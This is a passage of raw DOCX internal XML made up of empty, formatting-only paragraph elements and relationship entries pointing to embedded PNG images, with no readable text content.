          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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B2">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spacing w:line="360"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0B7">
      <w:pPr>
        <w:spacing w:line="360"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0B8">
      <w:pPr>
        <w:spacing w:line="360"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0BA">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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0BB">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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0BC">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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0BD">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="460" w:line="411.35999999999996" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="373a3c"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:color w:val="747474"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>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Courier New"/>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4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId16"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9.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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